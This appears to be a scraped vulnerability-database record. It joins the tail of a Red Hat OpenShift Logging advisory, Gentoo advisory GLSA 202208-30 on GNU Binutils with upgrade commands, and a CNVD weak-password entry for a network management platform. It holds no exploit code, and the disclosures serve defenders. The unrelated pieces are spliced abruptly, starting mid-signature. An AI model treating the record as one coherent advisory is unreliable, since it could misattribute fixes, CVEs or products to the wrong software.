ufjpRwSC1X5XRv9aqTX/ixIFLCeFpZkYhFLUlZqYHNKRcRlcqz5MLFA6KYdTj9zt
2ygqd5o26ml7gVHyA+BGE/pzd5m9YTzNvrWbC/ZV6loHM1nHUIBW/Y+hneSWTCkH
x1LCmTnYxyPz0ZjySbCy03SJPrRewe/xPlxJlCmqLfVh+hEvCHsSw9hnYC3+pvMB
xIl5HNf34dc/lJsPXo65owsDNcTlKF7gfVG3eKjcNnu1Uh9LzCYG8PKMtougZgV3
mAviF8MhgWVLXJTo6BXtF605ivViFoyis0bFJCV6uihV+nfAesWVN3rnIeDMh2sV
EA9zQyxzy2nQsDMJ4eLV5ckrl7YzGsJt+B9jwLXbGkpjQm+bCrds41k9gLjQEiHE
Vm3qGf43D60+Ds
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://listman.redhat.com/mailman/listinfo/rhsa-announce
. Solution:
For OpenShift Container Platform 4.9 see the following documentation, which
will be updated shortly for this release, for important instructions on how
to upgrade your cluster and fully apply this errata update:
https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html
For Red Hat OpenShift Logging 5.3, see the following instructions to apply
this update:
https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html
4. Bugs fixed (https://bugzilla.redhat.com/):
1963232 - CVE-2021-33194 golang: x/net/html: infinite loop in ParseFragment
5. JIRA issues fixed (https://issues.jboss.org/):
LOG-1168 - Disable hostname verification in syslog TLS settings
LOG-1235 - Using HTTPS without a secret does not translate into the correct 'scheme' value in Fluentd
LOG-1375 - ssl_ca_cert should be optional
LOG-1378 - CLO should support sasl_plaintext(Password over http)
LOG-1392 - In fluentd config, flush_interval can't be set with flush_mode=immediate
LOG-1494 - Syslog output is serializing json incorrectly
LOG-1555 - Fluentd logs emit transaction failed: error_class=NoMethodError while forwarding to external syslog server
LOG-1575 - Rejected by Elasticsearch and unexpected json-parsing
LOG-1735 - Regression introducing flush_at_shutdown
LOG-1774 - The collector logs should be excluded in fluent.conf
LOG-1776 - fluentd total_limit_size sets value beyond available space
LOG-1822 - OpenShift Alerting Rules Style-Guide Compliance
LOG-1859 - CLO Should not error and exit early on missing ca-bundle when cluster wide proxy is not enabled
LOG-1862 - Unsupported kafka parameters when enabled Kafka SASL
LOG-1903 - Fix the Display of ClusterLogging type in OLM
LOG-1911 - CLF API changes to Opt-in to multiline error detection
LOG-1918 - Alert `FluentdNodeDown` always firing
LOG-1939 - Opt-in multiline detection breaks cloudwatch forwarding
6. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 202208-30
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: GNU Binutils: Multiple Vulnerabilities
Date: August 14, 2022
Bugs: #778545, #792342, #829304
ID: 202208-30
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
=======
Multiple vulnerabilities have been discovered in Binutils, the worst of
which could result in denial of service.
Background
=========
The GNU Binutils are a collection of tools to create, modify and analyse
binary files. Many of the files use BFD, the Binary File Descriptor
library, to do low-level manipulation.
Affected packages
================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 sys-devel/binutils < 2.38 >= 2.38
2 sys-libs/binutils-libs < 2.38 >= 2.38
Description
==========
Multiple vulnerabilities have been discovered in GNU Binutils. Please
review the CVE identifiers referenced below for details.
Impact
=====
Please review the referenced CVE identifiers for details.
Workaround
=========
There is no known workaround at this time.
Resolution
=========
All Binutils users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=sys-devel/binutils-2.38"
All Binutils library users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=sys-libs/binutils-libs-2.38"
References
=========
[ 1 ] CVE-2021-3487
https://nvd.nist.gov/vuln/detail/CVE-2021-3487
[ 2 ] CVE-2021-3530
https://nvd.nist.gov/vuln/detail/CVE-2021-3530
[ 3 ] CVE-2021-3549
https://nvd.nist.gov/vuln/detail/CVE-2021-3549
[ 4 ] CVE-2021-20197
https://nvd.nist.gov/vuln/detail/CVE-2021-20197
[ 5 ] CVE-2021-20284
https://nvd.nist.gov/vuln/detail/CVE-2021-20284
[ 6 ] CVE-2021-20294
https://nvd.nist.gov/vuln/detail/CVE-2021-20294
[ 7 ] CVE-2021-45078
https://nvd.nist.gov/vuln/detail/CVE-2021-45078
Availability
===========
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/202208-30
Concerns?
========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
======
Copyright 2022 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5
| VAR-202102-1557 | No CVE | A weak password vulnerability exists in the AC centralized management platform (CNVD-2021-00876) |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Shenzhen Weimeng Technology Co., Ltd. is a leading domestic provider of network equipment and smart home product solutions. Its main products include wireless gateways, switches, foreign VPNs, dual-frequency ceiling-mounted APs, etc.
The AC centralized management platform has a weak password vulnerability, which can be exploited by attackers to obtain sensitive information.